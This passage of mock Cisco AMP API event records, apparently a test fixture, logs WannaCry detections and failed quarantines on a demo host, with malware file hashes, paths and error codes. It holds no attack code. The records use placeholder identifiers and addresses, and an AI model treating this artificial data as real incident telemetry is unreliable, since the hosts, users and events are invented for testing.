Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782274","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":134000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782273","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782272","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782271","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":56000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229335730782270","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229335730782000,"timestamp":1610635266,"timestamp_nanoseconds":87000000,"date":"2021-01-14T14:41:06+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":884000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847670","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847669","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847667","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847664","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":541000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat 